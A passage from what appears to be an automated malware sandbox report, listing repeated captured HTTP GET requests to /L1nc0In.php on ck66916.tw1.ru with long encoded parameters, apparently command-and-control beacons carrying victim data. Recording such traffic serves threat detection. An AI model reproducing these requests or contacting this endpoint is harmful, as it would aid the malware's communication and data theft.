p0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=0VfiIiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
